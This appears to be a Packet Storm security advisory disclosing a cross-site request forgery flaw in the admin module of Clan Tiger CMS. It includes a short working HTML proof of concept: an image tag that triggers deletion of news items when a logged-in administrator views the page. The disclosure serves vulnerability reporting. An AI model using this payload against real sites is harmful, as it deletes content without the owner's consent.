Clan Tiger CMS suffers from a cross site request forgery vulnerability.
8ac6d6d229428e13402d0a1955b048ba =======================================================================
Clain_TIger_CMS CSRF Vulnerability
=======================================================================
# Vulnerability found in- Admin module
# email Pratulag@yahoo.com
# company aksitservices
# Credit by Pratul Agrawal
# Software Clan Tiger_CMS
# Category CMS / Portals
# Site p4ge http://server/clantiger/index.php?module=login
# Plateform php
# Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)
# Proof of concept #
Targeted URL: http://servername/clantiger/
Script to Delete the News content through Cross Site request forgery
. ................................................................................................................
<html>
<body>
<img src=http://demo.opensourcecms.com/clantiger/clantiger/index.php?module=news&action=remove&id=[user ID] />
</body>
</html>
. ..................................................................................................................
After execution refresh the page and u can see that a added content is deleted automatically.
#If you have any questions, comments, or concerns, feel free to contact me.
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!